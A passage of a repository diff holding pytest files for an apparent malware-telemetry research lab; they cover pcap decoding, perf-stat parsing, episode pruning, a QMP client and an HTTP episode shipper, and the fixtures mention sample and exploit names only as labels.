def _write_pcap(path: Path, records: list[tuple[int, bytes]]) -> None:
path.write_bytes(_build_pcap(records))
# ---------------------------------------------------------------------------
# Tests
# ---------------------------------------------------------------------------
def test_iter_pcap_reads_records_back(tmp_path: Path) -> None:
p = tmp_path / "a.pcap"
frame = _ether(_ipv4("10.200.0.1", "10.200.0.10", 6, _tcp(40000, 21, flags=0x02)))
_write_pcap(p, [(1_000_000_000, frame)])
records = list(pcap._iter_pcap(p))
assert len(records) == 1
t_ns, data = records[0]
assert t_ns == 1_000_000_000
assert data == frame
def test_decode_tcp_syn() -> None:
f = _ether(_ipv4("10.200.0.1", "10.200.0.10", 6, _tcp(40000, 21, flags=0x02)))
d = pcap._decode(f)
assert d["ethertype"] == 0x0800
assert d["ip_proto"] == 6
assert d["src_ip"] == "10.200.0.1"
assert d["dst_ip"] == "10.200.0.10"
assert d["src_port"] == 40000
assert d["dst_port"] == 21
assert d["tcp_flags"] & 0x02
def test_decode_udp_dns_query() -> None:
f = _ether(_ipv4("10.200.0.10", "10.200.0.1", 17, _udp(33333, 53)))
d = pcap._decode(f)
assert d["ip_proto"] == 17
assert d["dst_port"] == 53
def test_bucketize_collapses_per_window(tmp_path: Path) -> None:
pcap_path = tmp_path / "ep.pcap"
netflow_path = tmp_path / "netflow.jsonl"
bridge_ip = "10.200.0.1"
guest_ip = "10.200.0.10"
base_ns = 1_700_000_000_000_000_000 # arbitrary, but a multiple of the 100 ms bucket width
records = [
# Bucket A (0..100ms)
(base_ns + 5_000_000,
_ether(_ipv4(guest_ip, bridge_ip, 6, _tcp(40000, 21, flags=0x02)))),
(base_ns + 9_000_000,
_ether(_ipv4(bridge_ip, guest_ip, 6, _tcp(21, 40000, flags=0x12)))),
# Bucket B (100..200ms): UDP DNS query
(base_ns + 105_000_000,
_ether(_ipv4(guest_ip, bridge_ip, 17, _udp(33333, 53)))),
# Bucket B: TCP RST
(base_ns + 199_000_000,
_ether(_ipv4(bridge_ip, guest_ip, 6, _tcp(21, 40000, flags=0x04)))),
]
_write_pcap(pcap_path, records)
rows_written = pcap.bucketize(
pcap_path, netflow_path,
bucket_ms=100,
t_mono_origin_ns=base_ns,
bridge_ip=bridge_ip,
)
assert rows_written == 2
rows = [json.loads(l) for l in netflow_path.read_text().splitlines()]
a, b = rows
assert a["bucket_ms"] == 100
# Bucket A: 1 in (SYN), 1 out (SYN-ACK)
assert a["pkts_in"] == 1
assert a["pkts_out"] == 1
assert a["syn_count"] == 2
assert a["tcp_new_flows"] == 1 # only the bare SYN counts as new flow
assert a["dns_query_count"] == 0
assert a["unique_dst_ips"] == 2
# Bucket B: DNS + RST
assert b["dns_query_count"] == 1
assert b["rst_count"] == 1
def test_bucketize_returns_zero_for_missing_file(tmp_path: Path) -> None:
rows = pcap.bucketize(
tmp_path / "nope.pcap",
tmp_path / "netflow.jsonl",
bucket_ms=100,
t_mono_origin_ns=0,
)
assert rows == 0
def test_bucketize_handles_unknown_ethertype(tmp_path: Path) -> None:
p = tmp_path / "x.pcap"
netflow = tmp_path / "n.jsonl"
# ARP frame (ethertype 0x0806) — counted but not decoded.
f = _ether(b"\x00" * 28, ethertype=0x0806)
_write_pcap(p, [(1_000_000_000, f)])
rows = pcap.bucketize(p, netflow, bucket_ms=100, t_mono_origin_ns=0)
assert rows == 1
out = json.loads(netflow.read_text().splitlines()[0])
# No IP info, but byte/packet count survives.
assert out["pkts_in"] + out["pkts_out"] == 1
assert out["tcp_count"] == 0
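
The pcap helpers in this test file build classic pcap bytes by hand and read them back. The round trip can be sketched on its own as below. This is a minimal illustration, not the project's `pcap._iter_pcap`: the names `GLOBAL_HDR`, `build_pcap`, and `iter_pcap` are hypothetical, and the global header values (little-endian, version 2.4, snaplen 65535, Ethernet link type) are assumptions based on the standard pcap layout.

```python
import struct

# Assumed classic little-endian pcap global header (24 bytes):
# magic, version major/minor, thiszone, sigfigs, snaplen, link type 1 (Ethernet).
GLOBAL_HDR = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)


def build_pcap(records):
    """Serialize (timestamp_ns, frame) pairs into pcap bytes."""
    out = bytearray(GLOBAL_HDR)
    for ts_ns, frame in records:
        sec = ts_ns // 1_000_000_000
        usec = (ts_ns // 1000) % 1_000_000
        # Per-record header: seconds, microseconds, captured length, original length.
        out += struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame
    return bytes(out)


def iter_pcap(blob):
    """Yield (timestamp_ns, frame) pairs back out of pcap bytes."""
    offset = len(GLOBAL_HDR)
    while offset + 16 <= len(blob):
        sec, usec, incl_len, _orig_len = struct.unpack_from("<IIII", blob, offset)
        offset += 16
        frame = blob[offset:offset + incl_len]
        offset += incl_len
        yield sec * 1_000_000_000 + usec * 1000, frame
```

Because the record header stores microseconds, timestamps only survive the round trip at microsecond resolution, which is why the test timestamps above are whole multiples of 1000 ns.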

82
tests/test_perf_qemu.py Normal file

@ -0,0 +1,82 @@
"""Tests for the perf-stat collector — parser logic in isolation
(no actual perf invocation, since perf needs CAP_SYS_ADMIN and
hardware counters that the test runner can't assume)."""
from __future__ import annotations
import json
from pathlib import Path
import pytest
from collectors import perf_qemu
def test_parse_event_line_extracts_fields() -> None:
line = '{"interval":0.100123,"counter-value":"1234567","unit":"","event":"cycles"}'
evt = perf_qemu.parse_perf_event_line(line)
assert evt is not None
assert evt["event"] == "cycles"
assert evt["interval"] == 0.100123
assert evt["counter-value"] == "1234567"
def test_parse_event_line_skips_non_json() -> None:
assert perf_qemu.parse_perf_event_line("") is None
assert perf_qemu.parse_perf_event_line("garbage") is None
assert perf_qemu.parse_perf_event_line("# Performance counter stats") is None
def test_coerce_int_handles_perf_quirks() -> None:
assert perf_qemu._coerce_int("1234567") == 1234567
assert perf_qemu._coerce_int("1,234,567") == 1234567
assert perf_qemu._coerce_int("<not counted>") is None
assert perf_qemu._coerce_int("<not supported>") is None
assert perf_qemu._coerce_int("") is None
assert perf_qemu._coerce_int(None) is None
assert perf_qemu._coerce_int(42) == 42
def test_build_row_computes_ipc_and_miss_rate() -> None:
agg = {
"cycles": 1_000_000_000,
"instructions": 660_000_000,
"cache-references": 1_000_000,
"cache-misses": 50_000,
"branches": 100_000_000,
"branch-misses": 5_000_000,
"page-faults": 12,
"context-switches": 20,
}
row = perf_qemu._build_row(t_mono_origin_ns=0, interval_s=0.1, agg=agg)
assert row["source"] == "host_perf"
assert row["available_in_deployment"] is False
assert row["cycles"] == 1_000_000_000
assert row["instructions"] == 660_000_000
assert pytest.approx(row["ipc"], abs=1e-9) == 0.66
assert pytest.approx(row["cache_miss_rate"], abs=1e-9) == 0.05
assert row["interval_s"] == 0.1
def test_build_row_handles_missing_counters() -> None:
"""If perf can't enable cache-misses on this hardware, the row
should still be valid, just with None for the missing fields."""
agg = {"cycles": 100, "instructions": 50}
row = perf_qemu._build_row(t_mono_origin_ns=0, interval_s=0.1, agg=agg)
assert row["cycles"] == 100
assert row["cache_misses"] is None
assert row["cache_miss_rate"] is None
assert pytest.approx(row["ipc"], abs=1e-9) == 0.5
def test_run_loop_returns_zero_when_perf_missing(tmp_path: Path, monkeypatch) -> None:
monkeypatch.setattr(perf_qemu, "perf_available", lambda: False)
import threading
rows = perf_qemu.run_loop(
pid=1,
output_path=tmp_path / "telemetry-perf.jsonl",
t_mono_origin_ns=0,
interval_ms=100,
stop_event=threading.Event(),
)
assert rows == 0
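
The row-builder tests above expect `ipc` and `cache_miss_rate` to be derived from raw counters, with `None` when a counter is unavailable. A minimal sketch of that derivation follows. The helper names `safe_ratio` and `derive_ratios` are hypothetical and are not taken from `perf_qemu`; the zero-denominator handling is also an assumption.

```python
def safe_ratio(numerator, denominator):
    """Return numerator / denominator, or None if either side is unusable."""
    if numerator is None or denominator is None or denominator == 0:
        return None
    return numerator / denominator


def derive_ratios(agg):
    """Compute derived metrics from a dict of perf event name -> count."""
    return {
        # Instructions per cycle.
        "ipc": safe_ratio(agg.get("instructions"), agg.get("cycles")),
        # Fraction of cache references that missed.
        "cache_miss_rate": safe_ratio(
            agg.get("cache-misses"), agg.get("cache-references")
        ),
    }
```

Returning `None` rather than `0.0` keeps "counter not supported on this hardware" distinguishable from "counter read zero" in the output rows.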

309
tests/test_prune.py Normal file

@ -0,0 +1,309 @@
"""Tests for cis490-prune. Builds synthetic episode tarballs (each
flagged with a specific quality issue) and confirms the classifier
catches them. Then exercises the index-walk + dry-run / archive /
delete actions on a temp tree so we don't touch real data."""
from __future__ import annotations
import io
import json
import shutil
import subprocess
import tarfile
from pathlib import Path
import pytest
# Skip the whole module if zstd isn't on PATH (the prune tool shells
# out for decompression, mirroring the shipper).
zstd_available = shutil.which("zstd") is not None
pytestmark = pytest.mark.skipif(not zstd_available, reason="needs system zstd")
import sys
ROOT = Path(__file__).resolve().parent.parent
sys.path.insert(0, str(ROOT / "tools"))
import prune_episodes as pe # noqa: E402
# ---------------------------------------------------------------------------
# tar+zstd builder
# ---------------------------------------------------------------------------
def _make_tar_zst(out_path: Path, files: dict[str, bytes]) -> None:
    """Build a {episode_id}/<file> layout, tar it, zstd it."""
    raw_tar = io.BytesIO()
    with tarfile.open(fileobj=raw_tar, mode="w") as t:
        for name, data in files.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            t.addfile(info, io.BytesIO(data))
    out_path.parent.mkdir(parents=True, exist_ok=True)
    raw_tmp = out_path.with_suffix(".tar")
    raw_tmp.write_bytes(raw_tar.getvalue())
    try:
        # Open the destination in a context manager so the handle is
        # closed (and flushed) even if zstd fails.
        with out_path.open("wb") as dst:
            subprocess.check_call(
                ["zstd", "-q", "-19", "--stdout", str(raw_tmp)],
                stdout=dst,
            )
    finally:
        raw_tmp.unlink(missing_ok=True)
def _meta(*, sample: dict | None = None, exploit: dict | None = None) -> bytes:
return json.dumps({
"episode_id": "01TEST",
"schema_version": 1,
"sample": sample,
"exploit": exploit,
"result": {"phases_observed": ["clean", "infected_running", "dormant"]},
}, sort_keys=True).encode()
def _events(rows: list[dict]) -> bytes:
return ("\n".join(json.dumps(r, sort_keys=True) for r in rows) + "\n").encode()
def _proc_rows(*, flat: bool, n: int = 80) -> bytes:
"""Synthesize /proc rows with either flat-CPU (no phase signal)
or sharply-spiking CPU (clear phase boundaries). The labels file
in each test episode pairs with these rows."""
out: list[dict] = []
for i in range(n):
t = i * 100_000_000
if flat:
jiff = 100 + i * 20 # uniform increment → flat CPU%
else:
# First third clean (low), middle infected (high), last third dormant (low).
jiff = (
100 + i * 20 if i < n // 3 or i >= 2 * n // 3
else 100 + i * 1000 # huge jump for "infected"
)
out.append({
"t_mono_ns": t,
"cpu_user_jiffies": jiff,
"cpu_sys_jiffies": 0,
"rss_bytes": 1024 * 1024,
})
return ("\n".join(json.dumps(r) for r in out) + "\n").encode()
def _labels(boundary_ns: list[int], names: list[str]) -> bytes:
rows = [
{"t_mono_ns": t, "phase": p, "prev": names[i - 1] if i else None}
for i, (t, p) in enumerate(zip(boundary_ns, names))
]
return ("\n".join(json.dumps(r) for r in rows) + "\n").encode()
# ---------------------------------------------------------------------------
# Per-reason classifier tests
# ---------------------------------------------------------------------------
def _make_episode(tmp_path: Path, **member_overrides) -> Path:
"""Default = a healthy episode with sample, exploit, workload events,
sharp CPU envelope. Overrides replace specific members."""
n = 60
end_ns = n * 100_000_000
members = {
"01TEST/meta.json": _meta(
sample={"name": "xmrig", "kind": "real", "family": "XMRig",
"category": "cryptominer", "profile": "cpu-saturate",
"sha256": "a" * 64},
exploit={"module_name": "vsftpd_234_backdoor", "module": "x"},
),
"01TEST/events.jsonl": _events([
{"event": "snapshot_load"},
{"event": "workload_setup"},
{"event": "workload_started", "phase": "infected_running"},
{"event": "workload_killed", "phase": "dormant",
"pre_kill_probe": {"yes": "2", "loadavg": "1.4"}},
{"event": "episode_end"},
]),
"01TEST/labels.jsonl": _labels(
[0, n // 3 * 100_000_000, 2 * n // 3 * 100_000_000],
["clean", "infected_running", "dormant"],
),
"01TEST/telemetry-proc.jsonl": _proc_rows(flat=False, n=n),
}
members.update(member_overrides)
out = tmp_path / "01TEST.tar.zst"
_make_tar_zst(out, members)
return out
def test_healthy_episode_has_no_reasons(tmp_path: Path) -> None:
tar = _make_episode(tmp_path)
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
assert q.reasons == [], f"unexpected reasons: {q.reasons}"
assert q.sample_name == "xmrig"
assert q.module_name == "vsftpd_234_backdoor"
def test_no_sample_flag(tmp_path: Path) -> None:
tar = _make_episode(
tmp_path,
**{"01TEST/meta.json": _meta(sample=None, exploit=None)},
)
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
assert "no-sample" in q.reasons
def test_no_workload_events_flag(tmp_path: Path) -> None:
tar = _make_episode(
tmp_path,
**{"01TEST/events.jsonl": _events([
{"event": "snapshot_load"},
{"event": "phase_transition", "to": "clean"},
{"event": "episode_end"},
])},
)
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
assert "no-workload-events" in q.reasons
def test_workload_failed_flag(tmp_path: Path) -> None:
tar = _make_episode(
tmp_path,
**{"01TEST/events.jsonl": _events([
{"event": "workload_setup"},
{"event": "workload_failed", "phase": "infected_running",
"error": "EOF on serial"},
{"event": "episode_end"},
])},
)
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
assert "workload-failed" in q.reasons
def test_workload_silent_flag(tmp_path: Path) -> None:
"""The elliott-lab fingerprint: dormant probe shows yes=0,
meaning the workload never actually fired."""
tar = _make_episode(
tmp_path,
**{"01TEST/events.jsonl": _events([
{"event": "workload_setup"},
{"event": "workload_started", "phase": "infected_running"},
{"event": "workload_killed", "phase": "dormant",
"pre_kill_probe": {"yes": "0", "loadavg": "0.18"}},
])},
)
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
assert "workload-silent" in q.reasons
def test_flat_cpu_flag(tmp_path: Path) -> None:
"""When the proc CPU% spread between phases is < 5pp, the episode
has no signal for the trainer to learn from."""
tar = _make_episode(
tmp_path,
**{"01TEST/telemetry-proc.jsonl": _proc_rows(flat=True, n=60)},
)
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
assert "flat-cpu" in q.reasons
# ---------------------------------------------------------------------------
# Walk + actions
# ---------------------------------------------------------------------------
def _stage_receiver_tree(tmp_path: Path) -> tuple[Path, Path]:
"""Build a fake /var/lib/cis490 layout with two episodes: one
healthy, one flagged for no-sample. Returns (episodes_root, index_path)."""
episodes = tmp_path / "episodes"
(episodes / "lab1").mkdir(parents=True)
healthy = _make_episode(episodes / "lab1" / "01OK")
healthy.rename(episodes / "lab1" / "01OK.tar.zst")
bad = _make_episode(
episodes / "lab1" / "01FAKE",
**{"01TEST/meta.json": _meta(sample=None)},
)
bad.rename(episodes / "lab1" / "01FAKE.tar.zst")
index = tmp_path / "index.jsonl"
rows = [
{"host_id": "lab1", "episode_id": "01OK"},
{"host_id": "lab1", "episode_id": "01FAKE"},
]
index.write_text("\n".join(json.dumps(r) for r in rows) + "\n")
return episodes, index
def test_dry_run_does_not_modify_anything(tmp_path: Path, capsys) -> None:
episodes, index = _stage_receiver_tree(tmp_path)
rc = pe.main([
"--episodes-root", str(episodes),
"--index", str(index),
"--reason", "no-sample",
])
# Returns 1 because flagged episodes exist (matches CLI exit semantics).
assert rc == 1
# Both tarballs still on disk.
assert (episodes / "lab1" / "01OK.tar.zst").exists()
assert (episodes / "lab1" / "01FAKE.tar.zst").exists()
# Index unchanged.
assert len(index.read_text().splitlines()) == 2
def test_archive_moves_flagged_and_rewrites_index(tmp_path: Path) -> None:
episodes, index = _stage_receiver_tree(tmp_path)
archive = tmp_path / "archive"
rc = pe.main([
"--episodes-root", str(episodes),
"--index", str(index),
"--archive-root", str(archive),
"--reason", "no-sample",
"--archive",
])
assert rc == 1
# 01OK kept.
assert (episodes / "lab1" / "01OK.tar.zst").exists()
# 01FAKE moved.
assert not (episodes / "lab1" / "01FAKE.tar.zst").exists()
assert (archive / "lab1" / "01FAKE.tar.zst").exists()
# Index dropped the bad row.
rows = [json.loads(l) for l in index.read_text().splitlines() if l.strip()]
assert len(rows) == 1
assert rows[0]["episode_id"] == "01OK"
def test_delete_removes_flagged_and_rewrites_index(tmp_path: Path) -> None:
episodes, index = _stage_receiver_tree(tmp_path)
rc = pe.main([
"--episodes-root", str(episodes),
"--index", str(index),
"--reason", "no-sample",
"--delete",
])
assert rc == 1
assert not (episodes / "lab1" / "01FAKE.tar.zst").exists()
rows = [json.loads(l) for l in index.read_text().splitlines() if l.strip()]
assert len(rows) == 1
def test_host_filter_scopes_to_one_lab_host(tmp_path: Path) -> None:
episodes, index = _stage_receiver_tree(tmp_path)
rc = pe.main([
"--episodes-root", str(episodes),
"--index", str(index),
"--reason", "no-sample",
"--host", "lab2", # nothing matches
])
assert rc == 0 # zero flagged → exit 0
assert (episodes / "lab1" / "01FAKE.tar.zst").exists()
def test_multiple_reasons_combine(tmp_path: Path) -> None:
"""An episode failing >1 signal is flagged once, all reasons listed."""
tar = _make_episode(
tmp_path,
**{"01TEST/meta.json": _meta(sample=None),
"01TEST/events.jsonl": _events([{"event": "snapshot_load"}])},
)
q = pe.classify_episode(tar, host_id="x", episode_id="01TEST")
assert "no-sample" in q.reasons
assert "no-workload-events" in q.reasons
assert q.fake
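
The archive and delete tests above expect the index to lose the flagged row while the healthy row survives. One way to do that rewrite safely is sketched below. This is an assumption about the approach, not the actual `prune_episodes` code: `rewrite_index` is a hypothetical name, and the write-to-temp-then-`os.replace` step is a design choice made here for illustration.

```python
import json
import os
import tempfile
from pathlib import Path


def rewrite_index(index_path: Path, flagged: set[tuple[str, str]]) -> int:
    """Drop rows whose (host_id, episode_id) is flagged; return rows kept."""
    kept = []
    for line in index_path.read_text().splitlines():
        if not line.strip():
            continue
        row = json.loads(line)
        if (row.get("host_id"), row.get("episode_id")) in flagged:
            continue
        kept.append(line)
    # Write to a sibling temp file, then swap it in atomically so a crash
    # mid-write never leaves a truncated index behind.
    fd, tmp_name = tempfile.mkstemp(
        dir=index_path.parent, prefix=index_path.name + "."
    )
    with os.fdopen(fd, "w") as fh:
        fh.write("".join(line + "\n" for line in kept))
    os.replace(tmp_name, index_path)
    return len(kept)
```

Keeping the temp file in the same directory as the index matters: `os.replace` is only atomic when source and destination are on the same filesystem.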

333
tests/test_qmp.py Normal file

@ -0,0 +1,333 @@
"""Tests for the QMP collector against an in-process fake QMP server.
The fake speaks just enough QMP to exercise:
- the greeting + qmp_capabilities handshake
- query-status
- query-blockstats
- query-stats target=vm
- error responses
- async events interleaved with command responses
"""
from __future__ import annotations
import json
import socket
import tempfile
import threading
import time
from pathlib import Path
from typing import Any
import pytest
from collectors import qmp
# ---------------------------------------------------------------------------
# Fake QMP server
# ---------------------------------------------------------------------------
class FakeQMPServer(threading.Thread):
"""Single-connection fake. Each line received from the client is
parsed as JSON; we look up ``execute`` in ``responses`` and emit
the configured reply. Optionally interleaves an async event before
the response."""
def __init__(
self,
socket_path: Path,
*,
responses: dict[str, Any] | None = None,
emit_event_before: set[str] | None = None,
) -> None:
super().__init__(daemon=True)
self.socket_path = socket_path
self.responses = responses or {}
self.emit_event_before = emit_event_before or set()
self.received: list[dict] = []
self._stop = threading.Event()
self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self._sock.bind(str(socket_path))
self._sock.listen(1)
self._sock.settimeout(5.0)
def run(self) -> None:
try:
conn, _ = self._sock.accept()
except socket.timeout:
return
conn.settimeout(5.0)
try:
# Greeting
conn.sendall(b'{"QMP": {"version": {"qemu": {"major":9,"minor":0,"micro":0}}, "capabilities": []}}\n')
buf = b""
while not self._stop.is_set():
try:
chunk = conn.recv(4096)
except socket.timeout:
if self._stop.is_set():
return
continue
if not chunk:
return
buf += chunk
while b"\n" in buf:
line, _, buf = buf.partition(b"\n")
if not line.strip():
continue
msg = json.loads(line)
self.received.append(msg)
cmd = msg.get("execute")
if cmd == "qmp_capabilities":
conn.sendall(b'{"return": {}}\n')
continue
if cmd in self.emit_event_before:
conn.sendall(b'{"event": "STOP", "timestamp": {"seconds": 1, "microseconds": 0}}\n')
if cmd in self.responses:
resp = self.responses[cmd]
conn.sendall((json.dumps(resp) + "\n").encode())
else:
conn.sendall(b'{"error": {"class": "CommandNotFound", "desc": "unknown"}}\n')
finally:
conn.close()
def shutdown(self) -> None:
self._stop.set()
try:
self._sock.close()
except OSError:
pass
@pytest.fixture
def qmp_server(tmp_path: Path):
sock_path = tmp_path / "qmp.sock"
return sock_path
# ---------------------------------------------------------------------------
# Client tests
# ---------------------------------------------------------------------------
def test_connect_negotiates_capabilities(qmp_server: Path) -> None:
server = FakeQMPServer(qmp_server)
server.start()
try:
client = qmp.QMPClient(qmp_server)
greeting = client.connect()
assert "version" in greeting
finally:
client.close()
server.shutdown()
# Server saw the qmp_capabilities call (other commands are not ruled out).
assert any(m.get("execute") == "qmp_capabilities" for m in server.received)
def test_execute_returns_payload(qmp_server: Path) -> None:
server = FakeQMPServer(
qmp_server,
responses={
"query-status": {"return": {"status": "running", "running": True}},
},
)
server.start()
try:
client = qmp.QMPClient(qmp_server)
client.connect()
out = client.execute("query-status")
assert out == {"status": "running", "running": True}
finally:
client.close()
server.shutdown()
def test_execute_skips_async_events_before_response(qmp_server: Path) -> None:
server = FakeQMPServer(
qmp_server,
responses={
"query-status": {"return": {"status": "running", "running": True}},
},
emit_event_before={"query-status"},
)
server.start()
try:
client = qmp.QMPClient(qmp_server)
client.connect()
out = client.execute("query-status")
assert out["running"] is True
finally:
client.close()
server.shutdown()
def test_execute_raises_on_qmp_error(qmp_server: Path) -> None:
server = FakeQMPServer(qmp_server) # no responses → server sends error
server.start()
try:
client = qmp.QMPClient(qmp_server)
client.connect()
with pytest.raises(qmp.QMPError):
client.execute("totally-fake-command")
finally:
client.close()
server.shutdown()
# ---------------------------------------------------------------------------
# Row builder tests
# ---------------------------------------------------------------------------
def test_collect_once_assembles_full_row(qmp_server: Path) -> None:
server = FakeQMPServer(
qmp_server,
responses={
"query-status": {"return": {"status": "running", "running": True}},
"query-blockstats": {"return": [{
"device": "virtio0",
"stats": {
"rd_operations": 12, "wr_operations": 4,
"rd_bytes": 49152, "wr_bytes": 16384,
"flush_operations": 1,
},
}]},
"query-stats": {"return": [{"stats": [
{"name": "halt_exits", "value": 17000},
{"name": "io_exits", "value": 942},
{"name": "string-skipped", "value": "not-an-int"},
]}]},
},
)
server.start()
try:
client = qmp.QMPClient(qmp_server)
client.connect()
row = qmp.collect_once(client, t_mono_origin_ns=time.monotonic_ns())
finally:
client.close()
server.shutdown()
assert row["source"] == "host_qmp"
assert row["available_in_deployment"] is False
assert row["vm_running"] is True
assert row["blockstats"]["virtio0"]["rd_bytes"] == 49152
assert row["blockstats"]["virtio0"]["flush_ops"] == 1
assert row["kvm_stats"]["halt_exits"] == 17000
assert "string-skipped" not in row["kvm_stats"]
def test_collect_once_tolerates_missing_query_stats(qmp_server: Path) -> None:
server = FakeQMPServer(
qmp_server,
responses={
"query-status": {"return": {"status": "running", "running": True}},
"query-blockstats": {"return": []},
# query-stats deliberately absent → server returns CommandNotFound
},
)
server.start()
try:
client = qmp.QMPClient(qmp_server)
client.connect()
row = qmp.collect_once(client, t_mono_origin_ns=time.monotonic_ns())
finally:
client.close()
server.shutdown()
# Older qemu without query-stats: row still exists, kvm_stats absent.
assert "kvm_stats" not in row
assert row["vm_running"] is True
assert row["blockstats"] == {}
# ---------------------------------------------------------------------------
# run_loop tests
# ---------------------------------------------------------------------------
def test_run_loop_writes_rows_and_stops_cleanly(qmp_server: Path, tmp_path: Path) -> None:
server = FakeQMPServer(
qmp_server,
responses={
"query-status": {"return": {"status": "running", "running": True}},
"query-blockstats": {"return": []},
"query-stats": {"error": {"class": "CommandNotFound", "desc": "n/a"}},
},
)
server.start()
out_path = tmp_path / "telemetry-qmp.jsonl"
stop = threading.Event()
def stop_after(ms: int) -> None:
time.sleep(ms / 1000.0)
stop.set()
threading.Thread(target=stop_after, args=(350,), daemon=True).start()
rows = qmp.run_loop(
socket_path=qmp_server,
output_path=out_path,
t_mono_origin_ns=time.monotonic_ns(),
interval_ms=100,
stop_event=stop,
)
server.shutdown()
assert rows >= 2, f"expected >=2 rows, got {rows}"
lines = [json.loads(l) for l in out_path.read_text().splitlines()]
assert len(lines) == rows
for r in lines:
assert r["source"] == "host_qmp"
assert r["vm_running"] is True
def test_savevm_and_loadvm_via_human_monitor(qmp_server: Path) -> None:
server = FakeQMPServer(
qmp_server,
responses={
"human-monitor-command": {"return": ""},
},
)
server.start()
try:
client = qmp.QMPClient(qmp_server)
client.connect()
out_save = client.savevm("baseline")
out_load = client.loadvm("baseline")
assert out_save == ""
assert out_load == ""
finally:
client.close()
server.shutdown()
# Both calls go out as human-monitor-command with the right cmdline.
hmcs = [m for m in server.received if m.get("execute") == "human-monitor-command"]
cmds = [m["arguments"]["command-line"] for m in hmcs]
assert "savevm baseline" in cmds
assert "loadvm baseline" in cmds
def test_loadvm_surface_error(qmp_server: Path) -> None:
server = FakeQMPServer(qmp_server) # no responses → error reply
server.start()
try:
client = qmp.QMPClient(qmp_server)
client.connect()
with pytest.raises(qmp.QMPError):
client.loadvm("does-not-exist")
finally:
client.close()
server.shutdown()
def test_run_loop_returns_zero_when_socket_missing(tmp_path: Path) -> None:
# No server bound to the socket path.
rows = qmp.run_loop(
socket_path=tmp_path / "nonexistent.sock",
output_path=tmp_path / "telemetry-qmp.jsonl",
t_mono_origin_ns=time.monotonic_ns(),
interval_ms=100,
stop_event=threading.Event(),
)
assert rows == 0
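
Several tests above rely on the client skipping async events that arrive before a command's reply. The core of that read loop can be sketched as follows. This is a simplified illustration, not the real `qmp.QMPClient`: `read_response` and `QMPCommandError` are hypothetical names, and the stream is assumed to yield one JSON message per line, as the fake server does.

```python
import io
import json


class QMPCommandError(Exception):
    """Hypothetical stand-in for the collector's own error type."""


def read_response(stream):
    """Read newline-delimited JSON until a command reply shows up."""
    for raw in stream:
        if not raw.strip():
            continue
        msg = json.loads(raw)
        if "event" in msg:
            # Async event (e.g. STOP); not the reply we are waiting for.
            continue
        if "error" in msg:
            raise QMPCommandError(msg["error"].get("desc", "unknown"))
        if "return" in msg:
            return msg["return"]
    raise ConnectionError("stream closed before a response arrived")
```

A quick usage example with an in-memory stream in place of a socket:

```python
stream = io.BytesIO(
    b'{"event": "STOP", "timestamp": {"seconds": 1, "microseconds": 0}}\n'
    b'{"return": {"status": "running", "running": true}}\n'
)
status = read_response(stream)
```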

327
tests/test_shipper.py Normal file

@ -0,0 +1,327 @@
"""End-to-end shipper tests.
These run a real Uvicorn server bound to 127.0.0.1 on a free port,
hosting the actual receiver Starlette app over an EpisodeStore on a
temp dir. The shipper then talks to that server with its real
`httpx.Client`, the same code path as production. This catches things
the receiver-side ASGI tests can't (HTTP framing, header handling,
sync httpx behaviour, content-length quirks).
"""
from __future__ import annotations
import json
import socket
import threading
import time
from pathlib import Path
import httpx
import pytest
import uvicorn
from receiver.app import make_app
from receiver.store import EpisodeStore
from shipper.config import ReceiverEndpoint, ShipperConfig
from shipper.queue import ShipperQueue
from shipper.transport import ShipperTransport
# ---------------------------------------------------------------------------
# Live-receiver fixture
# ---------------------------------------------------------------------------
def _free_port() -> int:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


class _ServerThread(threading.Thread):
    def __init__(self, app, port: int) -> None:
        super().__init__(daemon=True)
        cfg = uvicorn.Config(
            app,
            host="127.0.0.1",
            port=port,
            log_level="error",
            lifespan="off",
            access_log=False,
        )
        self.server = uvicorn.Server(cfg)

    def run(self) -> None:
        self.server.run()

    def stop(self) -> None:
        self.server.should_exit = True


def _wait_for_port(port: int, timeout_s: float = 5.0) -> None:
    deadline = time.monotonic() + timeout_s
    while time.monotonic() < deadline:
        try:
            with httpx.Client(timeout=0.5) as c:
                r = c.get(f"http://127.0.0.1:{port}/v1/health")
                if r.status_code == 200:
                    return
        except httpx.HTTPError:
            pass
        time.sleep(0.05)
    raise TimeoutError(f"receiver on 127.0.0.1:{port} did not come up")
@pytest.fixture
def store(tmp_path: Path) -> EpisodeStore:
return EpisodeStore(
store_root=tmp_path / "rcv-episodes",
incoming_root=tmp_path / "rcv-incoming",
index_path=tmp_path / "rcv-index.jsonl",
)
@pytest.fixture
def receiver(store: EpisodeStore):
app = make_app(store=store, max_episode_bytes=10_000_000, bearer_token=None)
port = _free_port()
server = _ServerThread(app, port)
server.start()
try:
_wait_for_port(port)
yield f"http://127.0.0.1:{port}", store
finally:
server.stop()
server.join(timeout=2)
@pytest.fixture
def receiver_with_bearer(store: EpisodeStore):
app = make_app(store=store, max_episode_bytes=10_000_000, bearer_token="s3cret")
port = _free_port()
server = _ServerThread(app, port)
server.start()
try:
_wait_for_port(port)
yield f"http://127.0.0.1:{port}", store
finally:
server.stop()
server.join(timeout=2)
def _make_shipper(
tmp_path: Path,
receiver_url: str,
*,
host_id: str = "lab1",
bearer: str | None = None,
) -> tuple[ShipperConfig, ShipperTransport, ShipperQueue]:
data_root = tmp_path / "lab-data"
cfg = ShipperConfig(
host_id=host_id,
data_root=data_root,
receiver=ReceiverEndpoint(url=receiver_url, bearer_token=bearer),
scan_interval_s=0.05,
)
transport = ShipperTransport(cfg)
queue = ShipperQueue(cfg, transport)
return cfg, transport, queue
def _make_episode(cfg: ShipperConfig, episode_id: str, *, content: bytes = b"data") -> Path:
ep = cfg.episodes_dir / episode_id
ep.mkdir(parents=True, exist_ok=True)
(ep / "meta.json").write_bytes(content)
(ep / "events.jsonl").write_text("{}\n")
(ep / "labels.jsonl").write_text("{}\n")
(ep / "telemetry-proc.jsonl").write_text("{}\n")
(ep / "done.marker").touch()
return ep
